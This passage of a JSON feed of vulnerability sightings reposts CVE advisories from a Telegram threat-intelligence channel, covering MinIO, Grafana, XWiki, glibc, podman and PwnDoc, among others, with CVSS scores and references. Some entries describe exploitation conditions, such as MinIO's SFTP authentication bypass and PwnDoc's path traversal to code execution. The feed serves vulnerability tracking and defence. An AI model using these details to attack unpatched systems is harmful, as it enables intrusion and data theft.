approval in TEAM.\n\nUpgrade TEAM to the latest release v.1.2.2. Follow instructions in updating TEAM documentation for updating process\n\ud83d\udccf Published: 2025-03-04T18:49:01.823Z\n\ud83d\udccf Modified: 2025-03-04T19:05:23.894Z\n\ud83d\udd17 References:\n1. https://github.com/aws-samples/iam-identity-center-team/security/advisories/GHSA-x9xv-r58p-qh86\n2. https://aws.amazon.com/security/security-bulletins/AWS-2025-004/", "creation_timestamp": "2025-03-04T19:33:46.000000Z"}, {"uuid": "85378e6d-5547-4c35-bf2f-02b8a3b88f77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC79-7X8X-2P58", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6422", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27414\n\ud83d\udd25 CVSS Score: 4.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: MinIO is a high performance object storage. Starting in RELEASE.2024-06-06T09-36-42Z and prior to \nRELEASE.2025-02-28T09-55-16Z, a bug in evaluating the trust of the SSH key used in an SFTP connection to MinIO allows authentication bypass and unauthorized data access. On a MinIO server with SFTP access configured and using LDAP as an external identity provider, MinIO supports SSH key based authentication for SFTP connections when the user has the `sshPublicKey` attribute set in their LDAP server. The server trusts the client's key only when the public key is the same as the `sshPublicKey` attribute. Due to the bug, when the user has no `sshPublicKey` property in LDAP, the server ends up trusting the key allowing the client to perform any FTP operations allowed by the MinIO access policies associated with the LDAP user (or any of their groups). Three requirements must be met in order to exploit the vulnerability. First, the MinIO server must be configured to allow SFTP access and use LDAP as an external identity provider. Second, the attacker must have knowledge of an LDAP username that does not have the `sshPublicKey` property set. Third, such an LDAP username or one of their groups must also have some MinIO access policy configured. When this bug is successfully exploited, the attacker can perform any FTP operations (i.e. reading, writing, deleting and listing objects) allowed by the access policy associated with the LDAP user account (and their groups). Version 1.2.0 fixes the issue.\n\ud83d\udccf Published: 2025-02-28T21:06:58.155Z\n\ud83d\udccf Modified: 2025-03-04T20:03:45.107Z\n\ud83d\udd17 References:\n1. https://github.com/minio/minio/security/advisories/GHSA-wc79-7x8x-2p58\n2. https://github.com/minio/minio/commit/4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec\n3. https://github.com/minio/minio/commit/91e1487de45720753c9e9e4c02b1bd16b7e452fa", "creation_timestamp": "2025-03-04T20:32:02.000000Z"}, {"uuid": "9c85f8c3-18c2-4d71-9c51-6b8ccdc0c43a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWFH-M3Q7-9JPW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6454", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27510\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: conda-forge-metadata provides programatic access to conda-forge's metadata. conda-forge-metadata uses an optional dependency - \"conda-oci-mirror\" which was neither present on the PyPi repository nor registered by any entity. If conda-oci-mirror is taken over by a threat actor, it can result in remote code execution.\n\ud83d\udccf Published: 2025-03-04T21:48:12.688Z\n\ud83d\udccf Modified: 2025-03-04T21:48:12.688Z\n\ud83d\udd17 References:\n1. https://github.com/conda-forge/conda-forge-metadata/security/advisories/GHSA-vwfh-m3q7-9jpw\n2. https://github.com/conda-forge/conda-forge-metadata/blob/799aee36b21ee06289d73d57838b28201f5a57af/pyproject.toml#L28", "creation_timestamp": "2025-03-04T22:33:26.000000Z"}, {"uuid": "aa8a22cc-5e7c-4922-81fd-83cf72478bd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRRG-GW7W-VP76", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6432", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-1410\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n  Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.\n\ud83d\udccf Published: 2023-03-23T07:48:56.246Z\n\ud83d\udccf Modified: 2025-03-04T21:22:03.229Z\n\ud83d\udd17 References:\n1. https://grafana.com/security/security-advisories/cve-2023-1410/\n2. https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\n3. https://security.netapp.com/advisory/ntap-20230420-0003/", "creation_timestamp": "2025-03-04T21:35:40.000000Z"}, {"uuid": "d93493ba-7146-4b23-9a72-e6dfa9fd424b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7409", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14152", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4806\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.\n\ud83d\udccf Published: 2023-09-18T16:33:57.211Z\n\ud83d\udccf Modified: 2025-04-30T19:57:53.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4806\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237782", "creation_timestamp": "2025-04-30T20:14:28.000000Z"}, {"uuid": "3deca8a3-ea91-4043-9e57-b08de1409f3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5455", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14152", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4806\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.\n\ud83d\udccf Published: 2023-09-18T16:33:57.211Z\n\ud83d\udccf Modified: 2025-04-30T19:57:53.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4806\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237782", "creation_timestamp": "2025-04-30T20:14:28.000000Z"}, {"uuid": "85c6cb27-8681-4a15-8913-f68b72b3b9b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRVJ-7Q4F-5P42", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6440", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-46875\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in eZ Platform Ibexa Kernel before 1.3.1.1. An XSS attack can occur because JavaScript code can be uploaded in a .html or .js file.\n\ud83d\udccf Published: 2023-03-12T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-04T21:15:50.044Z\n\ud83d\udd17 References:\n1. https://github.com/ezsystems/ezpublish-kernel/commit/29fecd2afe86f763510f10c02f14962d028f311b\n2. https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-mrvj-7q4f-5p42", "creation_timestamp": "2025-03-04T21:35:49.000000Z"}, {"uuid": "d266c25d-8a3e-4e07-8f3d-eb8a11c98cf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5453", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14152", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4806\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.\n\ud83d\udccf Published: 2023-09-18T16:33:57.211Z\n\ud83d\udccf Modified: 2025-04-30T19:57:53.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4806\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237782", "creation_timestamp": "2025-04-30T20:14:28.000000Z"}, {"uuid": "662e7258-2b44-4d19-a702-28a9dfd2b571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7409", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4813\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.\n\ud83d\udccf Published: 2023-09-12T21:54:33.387Z\n\ud83d\udccf Modified: 2025-04-30T19:58:08.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4813\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237798", "creation_timestamp": "2025-04-30T20:14:27.000000Z"}, {"uuid": "b710d589-e6e2-44f3-a144-bdf21e1481a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5453", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4813\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.\n\ud83d\udccf Published: 2023-09-12T21:54:33.387Z\n\ud83d\udccf Modified: 2025-04-30T19:58:08.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4813\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237798", "creation_timestamp": "2025-04-30T20:14:27.000000Z"}, {"uuid": "be8b6277-2e8f-437a-8eb5-e1742bc42f63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ3H-3WMW-J5VF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6701", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-25807\n\ud83d\udd25 CVSS Score: 7.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: DataEase is an open source data visualization and analysis tool. When saving a dashboard on the DataEase platform saved data can be modified and store malicious code. This vulnerability can lead to the execution of malicious code stored by the attacker on the server side when the user accesses the dashboard. The vulnerability has been fixed in version 1.18.3.\n\n\ud83d\udccf Published: 2023-02-28T15:05:33.087Z\n\ud83d\udccf Modified: 2025-03-06T16:26:01.200Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-xj3h-3wmw-j5vf\n2. https://github.com/dataease/dataease/commit/cc94fb8e69ddbb37c96d02ec0f0ddcd74273ef49", "creation_timestamp": "2025-03-06T16:33:59.000000Z"}, {"uuid": "52ecdc00-a452-4ddc-ae14-5bd03fad0fac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6F5-8JJ5-CXHR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6620", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26475\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Starting in version 2.3-milestone-1, the annotation displayer does not execute the content in a restricted context. This allows executing anything with the right of the author of any document by annotating the document. This has been patched in XWiki 13.10.11, 14.4.7 and 14.10. There is no easy workaround except to upgrade.\n\ud83d\udccf Published: 2023-03-02T18:07:04.129Z\n\ud83d\udccf Modified: 2025-03-05T21:23:14.514Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h6f5-8jj5-cxhr\n2. https://github.com/xwiki/xwiki-platform/commit/d87d7bfd8db18c20d3264f98c6deefeae93b99f7\n3. https://jira.xwiki.org/browse/XWIKI-20360\n4. https://jira.xwiki.org/browse/XWIKI-20384", "creation_timestamp": "2025-03-05T21:34:57.000000Z"}, {"uuid": "8945ff1b-6cd5-4a80-9b77-f0feefedcf41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1296", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "e6affb46-0ba0-4a9a-8e31-4d9145c212f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G839-X3P3-G5FM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5901", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1300\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \n\nThe CodeChecker web server contains an open redirect vulnerability due to missing protections against multiple slashes after the product name in the URL. This results in bypassing the protections against CVE-2021-28861, leading to the same open redirect pathway.\n\nThis issue affects CodeChecker: through 6.24.5.\n\ud83d\udccf Published: 2025-02-28T12:47:19.205Z\n\ud83d\udccf Modified: 2025-02-28T12:47:19.205Z\n\ud83d\udd17 References:\n1. https://github.com/Ericsson/codechecker/security/advisories/GHSA-g839-x3p3-g5fm", "creation_timestamp": "2025-02-28T13:27:11.000000Z"}, {"uuid": "67150cb6-b6fa-4cdb-aee5-d14bdd3b430d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PXH-89CX-4668", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5917", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27400\n\ud83d\udd25 CVSS Score: 2.9 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Magento Long Term Support (LTS) is an unofficial, community-driven project provides an alternative to the Magento Community Edition e-commerce platform with a high level of backward compatibility. Versions prior to 20.12.3 and 20.13.1 contain a vulnerability that allows script execution in the admin panel which could lead to cross-site scripting against authenticated admin users. The attack requires an admin user with configuration access, so in practicality it is not very likely to be useful given that a user with this level of access is probably already a full admin. Versions 20.12.3 and 20.13.1 contain a patch for the issue.\n\ud83d\udccf Published: 2025-02-28T15:26:14.265Z\n\ud83d\udccf Modified: 2025-02-28T15:43:37.220Z\n\ud83d\udd17 References:\n1. https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5pxh-89cx-4668\n2. https://github.com/OpenMage/magento-lts/commit/d307e5bf75729a2347dde0952fe9fd9fcd9c6aea\n3. https://github.com/OpenMage/magento-lts/releases/tag/v20.12.3\n4. https://github.com/OpenMage/magento-lts/releases/tag/v20.13.0", "creation_timestamp": "2025-02-28T16:27:02.000000Z"}, {"uuid": "d12a0bb2-0b3e-439e-9417-3c26b6e5d9d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H8H6-7752-G28C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5941", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27408\n\ud83d\udd25 CVSS Score: 4.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Manifest offers users a one-file micro back end. Prior to version 4.9.1, Manifest employs a weak password hashing implementation that uses SHA3 without a salt. This exposes user passwords to a higher risk of being cracked if an attacker gains access to the database. Without the use of a salt, identical passwords across multiple users will result in the same hash, making it easier for attackers to identify and exploit patterns, thereby accelerating the cracking process. Version 4.9.1 fixes the issue.\n\ud83d\udccf Published: 2025-02-28T17:26:15.196Z\n\ud83d\udccf Modified: 2025-02-28T18:11:49.988Z\n\ud83d\udd17 References:\n1. https://github.com/mnfst/manifest/security/advisories/GHSA-h8h6-7752-g28c\n2. https://github.com/mnfst/manifest/commit/3ed6f1324e96ad469ad929d470dcd0cc386c6c69", "creation_timestamp": "2025-02-28T18:26:23.000000Z"}, {"uuid": "a004bf1a-3a0f-49f6-bccf-34f4553d1276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F9C6-2F9P-82JJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14128", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46557\n\ud83d\udd25 CVSS Score: 8.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. In versions starting from 15.3-rc-1 to before 15.10.14, from 16.0.0-rc-1 to before 16.4.6, and from 16.5.0-rc-1 to before 16.10.0-rc-1, a user who can access pages located in the XWiki space (by default, anyone) can access the page XWiki.Authentication.Administration and (unless an authenticator is set in xwiki.cfg) switch to another installed authenticator. Note that, by default, there is only one authenticator available (Standard XWiki Authenticator). So, if no authenticator extension was installed, it's not really possible to do anything for an attacker. Also, in most cases, if an SSO authenticator is installed and utilized (like OIDC or LDAP for example), the worst an attacker can do is break authentication by switching back to the standard authenticator (that's because it's impossible to login to a user which does not have a stored password, and that's usually what SSO authenticator produce). This issue has been patched in versions 15.10.14, 16.4.6, and 16.10.0-rc-1.\n\ud83d\udccf Published: 2025-04-30T18:27:39.895Z\n\ud83d\udccf Modified: 2025-04-30T19:00:26.033Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f9c6-2f9p-82jj\n2. https://github.com/xwiki/xwiki-platform/commit/5efc31cea1501c9a5cb593566fea8b558ff32a2a\n3. https://jira.xwiki.org/browse/XWIKI-22604", "creation_timestamp": "2025-04-30T19:13:38.000000Z"}, {"uuid": "0d1a96a9-661c-4896-9e1f-70bb852a6490", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H856-FFVV-XVR4", "type": "seen", "source": "https://t.me/securixy_kz/959", "content": "", "creation_timestamp": "2026-07-13T00:00:34.888563Z"}, {"uuid": "545440b1-2074-4161-895f-4e7f6e463471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5145", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "e0014f88-e8ee-4c66-9215-e98b73713cb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX32-R9WR-WHFF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6026", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27416\n\ud83d\udd25 CVSS Score: 5.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:U)\n\ud83d\udd39 Description: Scratch-Coding-Hut.github.io is the website for Coding Hut. The website as of 28 February 2025 contained a sign in with scratch username and password form. Any user who used the sign in page would be susceptible to any other user signing into their account. As of time of publication, a fix is not available but work on a fix is underway. As a workaround, users should avoid signing in.\n\ud83d\udccf Published: 2025-03-01T00:10:29.184Z\n\ud83d\udccf Modified: 2025-03-01T00:10:29.184Z\n\ud83d\udd17 References:\n1. https://github.com/Scratch-Coding-Hut/Scratch-Coding-Hut.github.io/security/advisories/GHSA-xx32-r9wr-whff\n2. https://github.com/Scratch-Coding-Hut/Scratch-Coding-Hut.github.io/issues/3", "creation_timestamp": "2025-03-01T00:27:23.000000Z"}, {"uuid": "9cfcd78f-bcdd-4b2d-a1a6-9c1c1859a334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R3VJ-47CF-4672", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6421", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27413\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: PwnDoc is a penetration test reporting application. Prior to version 1.2.0, the backup restore functionality allows an administrator to import raw data into the database, including Path Traversal (`../`) sequences. This is problematic for the template update functionality as it uses the path from the database to write arbitrary content to, potentially overwriting source code to achieve Remote Code Execution. Any user with the `backups:create`, `backups:update` and `templates:update` permissions (only administrators by default) can write arbitrary content to anywhere on the filesystem. By overwriting source code, it is possible to achieve Remote Code Execution. Version 1.2.0 fixes the issue.\n\ud83d\udccf Published: 2025-02-28T21:02:35.656Z\n\ud83d\udccf Modified: 2025-03-04T20:09:20.769Z\n\ud83d\udd17 References:\n1. 